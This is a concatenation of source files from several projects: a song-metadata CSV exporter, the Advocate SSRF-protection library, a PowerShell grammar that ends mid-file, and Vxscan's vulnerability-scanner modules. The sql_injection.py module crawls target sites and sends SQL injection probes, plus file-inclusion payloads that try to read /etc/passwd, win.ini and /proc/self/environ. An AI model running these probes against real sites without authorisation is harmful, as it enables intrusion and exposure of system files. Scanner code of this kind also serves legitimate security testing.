# song.setGenreList()
song.keySignature = str(hdf5_getters.get_key(songH5File))
song.keySignatureConfidence = str(hdf5_getters.get_key_confidence(songH5File))
song.loudness = str(hdf5_getters.get_loudness(songH5File))
song.mode = str(hdf5_getters.get_mode(songH5File))
# song.lyrics = None
# song.popularity = None
song.hotttnesss = str(hdf5_getters.get_song_hotttnesss(songH5File))
song.tempo = str(hdf5_getters.get_tempo(songH5File))
song.timeSignature = str(hdf5_getters.get_time_signature(songH5File))
song.timeSignatureConfidence = str(hdf5_getters.get_time_signature_confidence(songH5File))
song.title = str(hdf5_getters.get_title(songH5File))
song.year = str(hdf5_getters.get_year(songH5File))
#print song count
csvRowString += str(song.songCount) + ","
for attribute in csvAttributeList:
# print "Here is the attribute: " + attribute + " \n"
if attribute == 'AlbumID'.lower():
csvRowString += song.albumID
elif attribute == 'AlbumName'.lower():
albumName = song.albumName
albumName = albumName.replace(',',"").replace('"', '""')
csvRowString += "\"" + albumName + "\""
elif attribute == 'ArtistID'.lower():
csvRowString += "\"" + song.artistID + "\""
elif attribute == 'ArtistLatitude'.lower():
latitude = song.artistLatitude
if latitude == 'nan':
latitude = ''
csvRowString += latitude
elif attribute == 'ArtistLocation'.lower():
location = song.artistLocation
location = location.replace(',','').replace('"', '""')
csvRowString += "\"" + location + "\""
elif attribute == 'ArtistLongitude'.lower():
longitude = song.artistLongitude
if longitude == 'nan':
longitude = ''
csvRowString += longitude
elif attribute == 'ArtistFamiliarity'.lower():
csvRowString += song.artistFamiliarity
elif attribute == 'ArtistHotttnesss'.lower():
csvRowString += song.artistHotttnesss
elif attribute == 'ArtistName'.lower():
csvRowString += "\"" + song.artistName.replace('"', '""') + "\""
elif attribute == 'ArtistMBTags'.lower():
csvRowString += "\"" + song.artistMBTags + "\""
# elif attribute == 'ArtistMBTagsCount'.lower():
# csvRowString += "\"" + song.artistMBTagsCount + "\""
elif attribute == 'ArtistTerms'.lower():
csvRowString += "\"" + song.artistTerms + "\""
elif attribute == 'Danceability'.lower():
csvRowString += song.danceability
elif attribute == 'Energy'.lower():
csvRowString += song.energy
elif attribute == 'Duration'.lower():
csvRowString += song.duration
elif attribute == 'KeySignature'.lower():
csvRowString += song.keySignature
elif attribute == 'KeySignatureConfidence'.lower():
# print "key sig conf: " + song.timeSignatureConfidence
csvRowString += song.keySignatureConfidence
elif attribute == 'Loudness'.lower():
csvRowString += song.loudness
elif attribute == 'Mode'.lower():
csvRowString += song.mode
elif attribute == 'SongID'.lower():
csvRowString += "\"" + song.id + "\""
elif attribute == 'Tempo'.lower():
# print "Tempo: " + song.tempo
csvRowString += song.tempo
elif attribute == 'Hotttnesss'.lower():
csvRowString += song.hotttnesss
elif attribute == 'TimeSignature'.lower():
csvRowString += song.timeSignature
elif attribute == 'TimeSignatureConfidence'.lower():
# print "time sig conf: " + song.timeSignatureConfidence
csvRowString += song.timeSignatureConfidence
elif attribute == 'Title'.lower():
csvRowString += "\"" + song.title.replace('"', '""') + "\""
elif attribute == 'Year'.lower():
csvRowString += song.year
else:
csvRowString += "Erm. This didn't work. Error. :( :(\n"
csvRowString += ","
#Remove the final comma from each row in the csv
lastIndex = len(csvRowString)
csvRowString = csvRowString[0:lastIndex-1]
csvRowString += "\n"
outputFile1.write(csvRowString)
csvRowString = ""
songH5File.close()
outputFile1.close()
main()
``` |
{
"source": "5up3rc/Advocate",
"score": 3
} |
#### File: Advocate/advocate/adapters.py
```python
from requests.adapters import HTTPAdapter, DEFAULT_POOLBLOCK
from .addrvalidator import AddrValidator
from .exceptions import ProxyDisabledException
from .poolmanager import ValidatingPoolManager
class ValidatingHTTPAdapter(HTTPAdapter):
__attrs__ = HTTPAdapter.__attrs__ + ['_validator']
def __init__(self, *args, **kwargs):
self._validator = kwargs.pop('validator', None)
if not self._validator:
self._validator = AddrValidator()
super(ValidatingHTTPAdapter, self).__init__(*args, **kwargs)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK,
**pool_kwargs):
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
# XXX: This would be unnecessary if the parent used a class-level
# `PoolManagerCls` attr here. Possible patch for urllib3?
self.poolmanager = ValidatingPoolManager(
num_pools=connections,
maxsize=maxsize,
block=block,
validator=self._validator,
**pool_kwargs
)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
"""
raise ProxyDisabledException("Proxy support not ready")
# TODO: Look into urllib3 internals to see what _proper_ proxy support
# would entail
# if proxy not in self.proxy_manager:
# proxy_headers = self.proxy_headers(proxy)
# # proxy itself if it's internal, but we want to use the validator
# # if we bypassed the proxy for a request.
# self.proxy_manager[proxy] = proxy_from_url(
# proxy,
# proxy_headers=proxy_headers,
# num_pools=self._pool_connections,
# maxsize=self._pool_maxsize,
# block=self._pool_block,
# validator=self._validator,
# **proxy_kwargs)
#
# return self.proxy_manager[proxy]
```
#### File: Advocate/test/monkeypatching.py
```python
import contextlib
import os.path
import socket
import re
import sys
import traceback
from advocate import RequestsAPIWrapper
class DisallowedConnectException(Exception):
pass
class CheckedSocket(socket.socket):
CONNECT_ALLOWED_FUNCS = {"validating_create_connection"}
# `test_testserver.py` makes raw connections to the test server to ensure it works
CONNECT_ALLOWED_FILES = {"test_testserver.py"}
_checks_enabled = True
@classmethod
@contextlib.contextmanager
def bypass_checks(cls):
try:
cls._checks_enabled = False
yield
finally:
cls._checks_enabled = True
@classmethod
def _check_frame_allowed(cls, frame):
if os.path.basename(frame[0]) in cls.CONNECT_ALLOWED_FILES:
return True
if frame[2] in cls.CONNECT_ALLOWED_FUNCS:
return True
return False
def connect(self, *args, **kwargs):
if self._checks_enabled:
stack = traceback.extract_stack()
if not any(self._check_frame_allowed(frame) for frame in stack):
raise DisallowedConnectException("calling socket.connect() unsafely!")
return super(CheckedSocket, self).connect(*args, **kwargs)
class AdvocateEnforcer(object):
"""
Forces all calls to `requests.(get/post/head/etc.)` to go through Advocate.
Used when running requests' test suite to verify that Advocate is API-compatible.
This is *NOT* appropriate for use in production.
"""
__name__ = "requests"
HOOKED_ATTRS = {"get", "post", "delete", "patch", "options", "put", "head", "session",
"Session", "request"}
ADVOCATE_RE = re.compile(r'\Aadvocate(\.|\Z)')
def __init__(self, validator):
self._orig_module = None
self._advocate_wrapper = RequestsAPIWrapper(validator)
@classmethod
def _inside_advocate_call(cls):
"""Check if we are already inside a function that's a part of Advocate"""
advocate_files = set()
for name, mod in sys.modules.items():
if not mod:
continue
if name and cls.ADVOCATE_RE.match(name):
advocate_files.add(mod.__file__)
stack_files = [x[0] for x in traceback.extract_stack()]
return advocate_files.intersection(stack_files)
@contextlib.contextmanager
def monkeypatch_requests_module(self):
"""Temporarily replace explicit requests calls with calls to Advocate"""
try:
self._orig_module = sys.modules['requests']
sys.modules['requests'] = self
yield
finally:
if self._orig_module:
sys.modules['requests'] = self._orig_module
self._orig_module = None
def __getattr__(self, item):
# We're already inside an advocate call? Pass through to the original val
should_hook = item in self.HOOKED_ATTRS
if not should_hook or not self._orig_module or self._inside_advocate_call():
return getattr(self._orig_module, item)
return getattr(self._advocate_wrapper, item)
``` |
{
"source": "5up3rc/Vxscan",
"score": 2
} |
#### File: Vxscan/lib/sql_injection.py
```python
import requests
from lxml import html
from lib.random_header import get_ua
from urllib import parse
import re
import concurrent.futures
from lib.settings import TIMEOUT
links = []
DBMS_ERRORS = { # regular expressions used for DBMS recognition based on error message response
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
"Microsoft SQL Server": (
r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*",
r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.",
r"(?s)Exception.*\WRoadhouse\.Cms\."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (
r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
"SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*",
r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
class Getoutofloop(Exception):
pass
OUT = []
def sqli(qurl):
global OUT
payload = {
"'", "%2527", "')", " AnD 7738=8291"
}
LFI_payload = {'../../../../etc/passwd|root:', '../../../../etc/group|root:', 'random.php|Failed opening',
'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='}
try:
for _ in payload:
url = qurl + _
r = requests.get(url, headers=get_ua(), timeout=TIMEOUT)
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if re.search(regex, r.text):
result = '{} SQLi:{}'.format(dbms, qurl)
OUT.append(result)
raise Getoutofloop
for i in LFI_payload:
url = ''
lfi, pattern = i.split('|')
if re.search(r'=\w+\.\w{3}$', qurl):
url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
elif re.search('=\w+', qurl):
url = re.sub(r'\w+$', lfi, qurl)
r = requests.get(url, headers=get_ua(), timeout=TIMEOUT)
if re.search(pattern, r.text, re.S):
OUT.append('LFI: {}'.format(url))
break
except:
pass
def parse_html(host):
urls = []
global links
try:
exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action', 'do']
r = requests.get(host, headers=get_ua(), timeout=3)
tmp = html.document_fromstring(r.text)
tmp.make_links_absolute(host)
link = tmp.iterlinks()
for i in link:
i = i[2]
ext = parse.urlparse(i)[2].split('.')[-1]
if ext in exts:
# 带参数的直接加入列表,不带参数的需要二次访问
if re.search('=', i) or re.search('/\?\w+=\w+', i):
links.append(i)
else:
urls.append(i)
except:
pass
return urls
def get_urls(result):
host = []
_ = []
for i in set(result):
# 通过urlparse 对url进行去参去重,相同的丢弃
url = parse.urlparse(i)
if url.netloc + url.path not in _:
host.append(i)
_.append(url.netloc + url.path)
with concurrent.futures.ThreadPoolExecutor(
max_workers=30) as executor:
executor.map(sqli, host)
def sql_check(host):
global links, OUT
result = parse_html(host)
with concurrent.futures.ThreadPoolExecutor(
max_workers=30) as executor:
executor.map(parse_html, result)
get_urls(links)
return OUT
if __name__ == "__main__":
host = 'https://elasticsearch.cn/'
print(sql_check(host))
```
#### File: Vxscan/script/solr_unauthorized_access.py
```python
from lib.verify import verify
from lib.random_header import get_ua
import requests
vuln = ['solr']
def check(ip, ports, apps):
if verify(vuln, ports, apps):
try:
url = 'http://' + ip
url = url + '/solr/'
g = requests.get(url, headers=get_ua(), timeout=5)
if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
return 'Apache Solr Admin leask'
except Exception:
pass
``` |
{
"source": "5up3rc/wispy",
"score": 3
} |
#### File: wispy/wispy/grammar.py
```python
import re
from modgrammar import (
Grammar, OR, WORD, REPEAT, ANY_EXCEPT,
OPTIONAL, ANY, EXCEPT,
LIST_OF, REF, WHITESPACE,
)
from modgrammar.extras import RE
# pylint: disable=invalid-name
def RE_LITERAL(regex, *args, regex_flags=re.I | re.MULTILINE, **kwargs):
""" A Literal grammar which uses a regular expression instead
of a simple string check.
This has the benefit that certain flags can be applied to the
regex, before building the grammar, using *regex_flags* keyword argument.
By default, using *RE_LITERAL* ignores the case of the match.
"""
regex = re.compile(regex, regex_flags)
return RE(regex, *args, **kwargs)
def ignore_case_literals(*args):
""" Receive a list of strings and return a list of grammars
for each of those strings.
In this case, the grammars ignores the case of the match.
"""
return list(map(RE_LITERAL, args))
class EscapedCharacter(Grammar):
"""An escaped character is a way to assign a special interpretation
to a character by giving it a prefix Backtick character."""
grammar = ("\u0060", ANY)
class Colon(Grammar):
grammar = "\u003A"
class Dimension(Grammar):
grammar_whitespace_mode = "optional"
grammar = REPEAT((",", OPTIONAL(WHITESPACE)))
class NonAmpersandCharacter(Grammar):
grammar = ANY_EXCEPT("&", max=1)
class DoubleQuoteCharacter(Grammar):
grammar = OR("\u0022", "\u201C", "\u201D", "\u201E")
class NonDoubleQuoteCharacter(Grammar):
grammar = EXCEPT(ANY, DoubleQuoteCharacter, max=1)
class NonDoubleQuoteCharacters(Grammar):
grammar = REPEAT(NonDoubleQuoteCharacter)
class Dollars(Grammar):
grammar = REPEAT("$")
class NewLineCharacter(Grammar):
grammar = OR("\u000D\u000A", "\u000D", "\u000A")
class StatementTerminator(Grammar):
grammar = OR(";", NewLineCharacter)
class StatementTerminators(Grammar):
grammar = REPEAT(StatementTerminator)
class NewLines(Grammar):
grammar = REPEAT(NewLineCharacter)
class Dash(Grammar):
grammar = OR("\u002D", "\u2013", "\u2014", "\u2015")
class DashDash(Grammar):
grammar = (Dash, Dash)
class FormatOperator(Grammar):
grammar = (Dash, "f")
class ComparisonOperator(Grammar):
operators = ignore_case_literals(
"as", "ccontains", "ceq", "cge", "cgt", "cle", "clike",
"clt", "cmatch", "cne", "cnotcontains", "cnotlike",
"cnotmatch", "contains", "creplace", "csplit", "eq",
"ge", "gt", "icontains", "ieq", "ige", "igt", "ile",
"ilike", "ilt", "imatch", "in", "ine", "inotcontains",
"inotlike", "inotmatch", "ireplace", "is", "isnot",
"isplit", "join", "le", "like", "lt", "match", "ne",
"notcontains", "notin", "notlike", "notmatch", "replace",
"shl", "shr", "split"
)
grammar = (Dash, OR(*operators))
class FileRedirectionOperator(Grammar):
grammar = OR(
">", ">>", "2>", "2>>", "3>", "3>>", "4>", "4>>",
"5>", "5>>", "6>", "6>>", "*>", "*>>", "<"
)
class MergingRedirectionOperator(Grammar):
grammar = OR(
'*>&1', '2>&1', '3>&1', '4>&1', '5>&1', '6>&1',
'*>&2', '1>&2', '3>&2', '4>&2', '5>&2', '6>&2')
class AssignmentOperator(Grammar):
grammar = OR(
"=", (Dash, "="), "+=", "*=", "/=", "%="
)
class OperatorOrPunctuator(Grammar):
grammar = OR(
"{", "}", "[", "]", "(", ")", "@(", "@{", "$(", ";",
"&&", "||", "&", "|", ",", "++", "..", "::", ".",
"!", "*", "/", "%", "+",
(Dash,
OR(Dash,
*ignore_case_literals(
"and", "band", "bnot", "bor",
"bxor", "not", "or", "xor"
))),
Dash,
AssignmentOperator,
MergingRedirectionOperator,
FileRedirectionOperator,
ComparisonOperator,
FormatOperator,
)
# End of grammar Operators and punctuators
# Grammars for Type Names
class TypeCharacter(Grammar):
grammar = OR(
WORD("A-Za-z", max=1),
WORD("\u005F"),
)
class TypeCharacters(Grammar):
grammar = WORD("A-Za-z\u005F")
class TypeIdentifier(Grammar):
grammar = TypeCharacters
class TypeName(Grammar):
grammar = LIST_OF(TypeIdentifier, sep=".")
class GenericTypeArguments(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(REF('TypeSpec'), sep=(",", OPTIONAL(WHITESPACE)))
class TypeSpec(Grammar):
grammar = (
TypeName,
OPTIONAL(
("[", OR(
GenericTypeArguments,
OPTIONAL(Dimension)
), "]"))
)
class TypeLiteral(Grammar):
grammar = ("[", TypeSpec, "]")
class SimpleNameFirstCharacter(Grammar):
grammar = TypeCharacter
class SimpleNameCharacter(Grammar):
grammar = SimpleNameFirstCharacter
class SimpleNameCharacters(Grammar):
grammar = REPEAT(SimpleNameCharacter)
class SimpleName(Grammar):
grammar = (SimpleNameFirstCharacter, SimpleNameCharacters)
# Grammar for Variables
class BracedVariableCharacter(Grammar):
grammar = OR(
ANY_EXCEPT("\u007D\u0060", max=1),
EscapedCharacter
)
class BracedVariableCharacters(Grammar):
grammar = REPEAT(BracedVariableCharacter)
class VariableCharacters(Grammar):
grammar = WORD("A-Za-z0-9?\u005F")
class VariableNamespace(Grammar):
grammar = (VariableCharacters, ":")
class VariableScope(Grammar):
grammar = OR(
VariableNamespace,
*ignore_case_literals("global:", "local:", "private:", "script:")
)
class BracedVariable(Grammar):
grammar = ("${", OPTIONAL(VariableScope),
BracedVariableCharacters, "}")
class Variable(Grammar):
grammar = OR(
"$$", "$?", "$^",
(OR("$", "@"), OPTIONAL(VariableScope), VariableCharacters),
BracedVariable
)
# End of grammar for variables
# Grammar for Literals
class SingleQuoteCharacter(Grammar):
grammar = OR("\u0027", "\u2018", "\u2019", "\u201A", "\u201B")
class VerbatimHereStringPart(Grammar):
grammar = OR(
EXCEPT(ANY, NewLineCharacter),
(NewLineCharacter, EXCEPT(ANY, SingleQuoteCharacter)),
(NewLineCharacter, SingleQuoteCharacter, ANY_EXCEPT("@", max=1))
)
class VerbatimHereStringCharacters(Grammar):
grammar = REPEAT(VerbatimHereStringPart)
class VerbatimHereStringLiteral(Grammar):
grammar = ("@", SingleQuoteCharacter, OPTIONAL(WHITESPACE),
NewLineCharacter, OPTIONAL(VerbatimHereStringCharacters),
NewLineCharacter, SingleQuoteCharacter, "@")
class VerbatimStringPart(Grammar):
grammar = OR(
EXCEPT(ANY, SingleQuoteCharacter),
(SingleQuoteCharacter, SingleQuoteCharacter)
)
class VerbatimStringCharacters(Grammar):
grammar = REPEAT(VerbatimStringPart)
class VerbatimStringLiteral(Grammar):
grammar = (SingleQuoteCharacter, OPTIONAL(VerbatimStringCharacters),
SingleQuoteCharacter)
class ExpandableStringPart(Grammar):
grammar = OR(
EXCEPT(ANY, OR('$', '\u0060', DoubleQuoteCharacter), max=1),
BracedVariable,
("$", ANY_EXCEPT("({\u0060", max=1) - DoubleQuoteCharacter),
("$", EscapedCharacter),
EscapedCharacter,
(DoubleQuoteCharacter, DoubleQuoteCharacter),
)
class ExpandableHereStringPart(Grammar):
grammar = OR(
ANY_EXCEPT("$", max=1) - NewLineCharacter,
BracedVariable,
("$", ANY_EXCEPT("(", max=1) - NewLineCharacter),
("$", NewLineCharacter, ANY - DoubleQuoteCharacter),
("$", NewLineCharacter, DoubleQuoteCharacter, ANY_EXCEPT("@", max=1)),
(NewLineCharacter, ANY - DoubleQuoteCharacter),
(NewLineCharacter, DoubleQuoteCharacter, ANY_EXCEPT("@", max=1))
)
class ExpandableStringCharacters(Grammar):
grammar = REPEAT(ExpandableStringPart)
class ExpandableStringWithSubexprStart(Grammar):
grammar = (DoubleQuoteCharacter, OPTIONAL(ExpandableStringCharacters),
"$(")
class ExpandableStringWithSubexprEnd(Grammar):
grammar = DoubleQuoteCharacter
class ExpandableStringLiteral(Grammar):
grammar = (DoubleQuoteCharacter, OPTIONAL(ExpandableStringCharacters),
OPTIONAL(Dollars), DoubleQuoteCharacter)
class ExpandableHereStringCharacters(Grammar):
grammar = REPEAT(ExpandableHereStringPart)
class ExpandableHereStringWithSubexprStart(Grammar):
grammar = (
"@", DoubleQuoteCharacter, OPTIONAL(WHITESPACE),
NewLineCharacter, OPTIONAL(ExpandableHereStringCharacters),
"$("
)
class ExpandableHereStringWithSubexprEnd(Grammar):
grammar = (NewLineCharacter, DoubleQuoteCharacter, "@")
class ExpandableHereStringLiteral(Grammar):
grammar = ("@", DoubleQuoteCharacter, OPTIONAL(WHITESPACE),
NewLineCharacter, OPTIONAL(ExpandableHereStringCharacters),
NewLineCharacter, DoubleQuoteCharacter, "@")
class StringLiteral(Grammar):
grammar = OR(ExpandableStringLiteral,
ExpandableHereStringLiteral,
VerbatimStringLiteral,
VerbatimHereStringLiteral)
class DecimalDigits(Grammar):
grammar = WORD('0-9')
class NumericMultiplier(Grammar):
grammar = OR(*ignore_case_literals("kb", "mb", "tb", "pb", "gb"))
class LongTypeSuffix(Grammar):
grammar = OR("l", "L")
class DecimalTypeSuffix(Grammar):
grammar = OR("d", "D", "l", "L")
class NumericTypeSuffix(Grammar):
grammar = OR(DecimalTypeSuffix, LongTypeSuffix)
class Sign(Grammar):
grammar = OR("+", Dash, max=1)
class ExponentPart(Grammar):
grammar = (OR("e", "E"), OPTIONAL(Sign), DecimalDigits)
class HexadecimalDigit(Grammar):
grammar = WORD('0-9a-fA-F', max=1)
class HexadecimalDigits(Grammar):
grammar = OR(REPEAT(HexadecimalDigit),
(HexadecimalDigit, DecimalDigits))
class RealLiteral(Grammar):
grammar = OR(
(DecimalDigits, ".", DecimalDigits, OPTIONAL(ExponentPart),
OPTIONAL(DecimalTypeSuffix), OPTIONAL(NumericMultiplier)),
(".", DecimalDigits, OPTIONAL(ExponentPart),
OPTIONAL(DecimalTypeSuffix), OPTIONAL(NumericMultiplier)),
(DecimalDigits, ExponentPart, OPTIONAL(DecimalTypeSuffix),
OPTIONAL(NumericMultiplier)))
class HexadecimalIntegerLiteral(Grammar):
grammar = ("0x", HexadecimalDigits,
OPTIONAL(LongTypeSuffix),
OPTIONAL(NumericMultiplier))
class DecimalIntegerLiteral(Grammar):
grammar = (DecimalDigits,
OPTIONAL(NumericTypeSuffix),
OPTIONAL(NumericMultiplier))
class IntegerLiteral(Grammar):
grammar = OR(HexadecimalIntegerLiteral, DecimalIntegerLiteral)
class Literal(Grammar):
grammar = OR(RealLiteral, IntegerLiteral, StringLiteral)
# End of grammar for Literals
# Grammar for Commands
class GenericTokenChar(Grammar):
grammar = OR(
EXCEPT(ANY,
OR(
DoubleQuoteCharacter,
SingleQuoteCharacter,
WHITESPACE,
NewLineCharacter,
"{", "}", "(", ")", ";", ",", "|", "&", "$", "\u0060",
)),
EscapedCharacter
)
class GenericTokenPart(Grammar):
grammar = OR(
ExpandableStringLiteral,
VerbatimHereStringLiteral,
Variable,
GenericTokenChar
)
class GenericTokenParts(Grammar):
grammar = REPEAT(GenericTokenPart)
class GenericTokenWithSubexprStart(Grammar):
grammar = (GenericTokenParts, "$(")
class GenericToken(Grammar):
grammar = GenericTokenParts
class FirstParameterCharacter(Grammar):
grammar = OR(
WORD("A-Za-z", max=1),
# The underscore character and question mark
"\u005F", "?"
)
class ParameterCharacter(Grammar):
grammar = EXCEPT(ANY, OR(Colon, WHITESPACE, NewLineCharacter,
"{", "}", "(", ")", ";", ",", "|",
"&", ".", "["))
class ParameterCharacters(Grammar):
grammar = REPEAT(ParameterCharacter)
class CommandParameter(Grammar):
grammar = (Dash, FirstParameterCharacter,
ParameterCharacters, OPTIONAL(Colon))
# End of grammar for Commands
class StatementList(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(REF('Statement'), sep=OPTIONAL(WHITESPACE))
class StatementBlock(Grammar):
grammar_whitespace_mode = "optional"
grammar = ("{", OPTIONAL(StatementList), "}")
class SubExpression(Grammar):
grammar_whitespace_mode = "optional"
grammar = ("$(", OPTIONAL(StatementList), ")")
class BlockName(Grammar):
grammar = OR(
*ignore_case_literals("dynamicparam", "begin", "process", "end")
)
class NamedBlock(Grammar):
grammar = (BlockName, OPTIONAL(WHITESPACE),
StatementBlock,
OPTIONAL(StatementTerminators))
class NamedBlockList(Grammar):
grammar = LIST_OF(NamedBlock, sep=OPTIONAL(WHITESPACE))
class ScriptBlockBody(Grammar):
grammar = OR(NamedBlockList, StatementList)
class ParamBlock(Grammar):
# FIXME: Remove References
grammar_whitespace_mode = "optional"
grammar = (
RE_LITERAL("param"), OPTIONAL(NewLines),
"(", OPTIONAL(REF('ParameterList')), ")"
)
class ScriptBlock(Grammar):
# This grammar can be considered the root grammar.
grammar = (
OPTIONAL(ParamBlock), OPTIONAL(StatementTerminators),
OPTIONAL(ScriptBlockBody)
)
class VerbatimCommandString(Grammar):
grammar = (DoubleQuoteCharacter, NonDoubleQuoteCharacters,
DoubleQuoteCharacter)
class VerbatimCommandArgumentPart(Grammar):
grammar = OR(
VerbatimCommandString,
("&", NonAmpersandCharacter),
EXCEPT(ANY, OR("|", NewLineCharacter))
)
class VerbatimCommandArgumentChars(Grammar):
grammar = REPEAT(VerbatimCommandArgumentPart)
class Keyword(Grammar):
grammar = OR(*ignore_case_literals(
"workflow", "inlinescript", "parallel", "begin", "break", "catch",
"class", "continue", "data", "define", "do", "dynamicparam", "elseif",
"else", "end", "exit", "filter", "finally", "foreach", "for", "from",
"function", "if", "in", "param", "process", "return", "switch", "var",
"throw", "trap", "try", "until", "using", "while"
))
class ExpandableHereStringWithSubexprPart(Grammar):
grammar = OR(SubExpression, ExpandableHereStringPart)
class ExpandableHereStringWithSubexprCharacters(Grammar):
grammar = REPEAT(ExpandableHereStringWithSubexprPart)
class ExpandableHereStringLiteralWithSubexpr(Grammar):
grammar = (
ExpandableHereStringWithSubexprStart,
OPTIONAL(StatementList),
ExpandableHereStringWithSubexprCharacters,
ExpandableHereStringWithSubexprEnd
)
class ExpandableStringWithSubexprPart(Grammar):
grammar = OR(SubExpression, ExpandableStringPart)
class ExpandableStringWithSubexprCharacters(Grammar):
grammar = REPEAT(ExpandableStringWithSubexprPart)
class ExpandableStringLiteralWithSubexpr(Grammar):
grammar = OR(
(
ExpandableStringWithSubexprStart, OPTIONAL(StatementList),
")", ExpandableStringWithSubexprCharacters,
ExpandableStringWithSubexprEnd
),
(
ExpandableHereStringWithSubexprStart, OPTIONAL(StatementList),
")", ExpandableHereStringWithSubexprCharacters,
ExpandableHereStringWithSubexprEnd
)
)
class StringLiteralWithSubexpression(Grammar):
grammar = OR(
ExpandableStringLiteralWithSubexpr,
ExpandableHereStringLiteralWithSubexpr
)
class MemberName(Grammar):
grammar = OR(
# FIXME: Remove references
SimpleName, StringLiteral, StringLiteralWithSubexpression,
REF('ExpressionWithUnaryOperator'), REF('Value')
)
class RangeArgumentExpression(Grammar):
grammar = OR(
# FIXME: Remove references
REF('UnaryExpression'),
(
REF('RangeExpression'), "..", OPTIONAL(NewLines),
REF('UnaryExpression')
)
)
class FormatArgumentExpression(Grammar):
grammar = LIST_OF(RangeArgumentExpression,
sep=(FormatOperator, OPTIONAL(NewLines)))
class MultiplicativeArgumentExpression(Grammar):
grammar = LIST_OF(FormatArgumentExpression,
sep=(OR("*", "/", "%"), OPTIONAL(NewLines)))
class AdditiveArgumentExpression(Grammar):
grammar = LIST_OF(MultiplicativeArgumentExpression,
sep=(OR("+", Dash), OPTIONAL(NewLines)))
class ComparisonArgumentExpression(Grammar):
grammar = LIST_OF(AdditiveArgumentExpression,
sep=(ComparisonOperator, OPTIONAL(NewLines)))
class BitwiseArgumentExpression(Grammar):
grammar = LIST_OF(
ComparisonArgumentExpression,
sep=(
OR(RE_LITERAL("-band"),
RE_LITERAL("-bor"),
RE_LITERAL("-bxor")),
OPTIONAL(NewLines)
)
)
class LogicalArgumentExpression(Grammar):
grammar = LIST_OF(
BitwiseArgumentExpression,
sep=(
OR(RE_LITERAL("-and"),
RE_LITERAL("-or"),
RE_LITERAL("-xor")),
OPTIONAL(NewLines)
)
)
class ArgumentExpressionList(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(LogicalArgumentExpression,
sep=(OPTIONAL(NewLines), ",", OPTIONAL(WHITESPACE)))
class ArgumentList(Grammar):
grammar = ("(", OPTIONAL(ArgumentExpressionList), OPTIONAL(NewLines), ")")
class InvocationExpressionPrime(Grammar):
grammar = (OR(".", "::"), OPTIONAL(WHITESPACE), MemberName,
ArgumentList, OPTIONAL(REF("InvocationExpressionPrime")))
class ElementAccessPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = ("[", OPTIONAL(NewLines), REF("Expression"),
OPTIONAL(NewLines), "]",
OPTIONAL(REF("ElementAccessPrime")))
class MemberAccessPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = (OR(".", "::"), OPTIONAL(WHITESPACE),
MemberName, OPTIONAL(REF('MemberAccessPrime')))
class PostDecrementExpressionPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = (DashDash, OPTIONAL(REF("PostDecrementExpressionPrime")))
class PostIncrementExpressionPrime(Grammar):
# Use this idiom to get rid of left recursion.
grammar = ("++", OPTIONAL(REF("PostIncrementExpressionPrime")))
class KeyExpression(Grammar):
# FIXME: Remove reference
grammar = OR(
SimpleName,
REF('UnaryExpression')
)
class HashEntry(Grammar):
# FIXME: Remove reference
grammar = (KeyExpression,
OPTIONAL(WHITESPACE), "=",
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines),
REF('Statement'))
class HashLiteralBodyPrime(Grammar):
grammar = (StatementTerminators, HashEntry,
OPTIONAL(REF("HashLiteralBodyPrime")))
class HashLiteralBody(Grammar):
grammar = LIST_OF(HashEntry,
sep=(OPTIONAL(WHITESPACE),
OPTIONAL(HashLiteralBodyPrime),
OPTIONAL(WHITESPACE)))
class HashLiteralExpression(Grammar):
grammar = ("@{", OPTIONAL(NewLines),
OPTIONAL(WHITESPACE),
OPTIONAL(HashLiteralBody),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines), "}")
class ScriptBlockExpression(Grammar):
grammar = ("{", OPTIONAL(NewLines), ScriptBlock,
OPTIONAL(NewLines), "}")
class ArrayExpression(Grammar):
grammar_whitespace_mode = "optional"
grammar = ("@(", OPTIONAL(StatementList), ")")
class ParenthesizedExpression(Grammar):
grammar_whitespace_mode = "optional"
# TODO: remove reference
grammar = ("(", REF('Pipeline'), ")")
class Value(Grammar):
grammar = OR(
ParenthesizedExpression,
SubExpression,
ArrayExpression,
ScriptBlockExpression,
HashLiteralExpression,
Literal,
TypeLiteral,
Variable
)
class PrimaryExpressionPrime(Grammar):
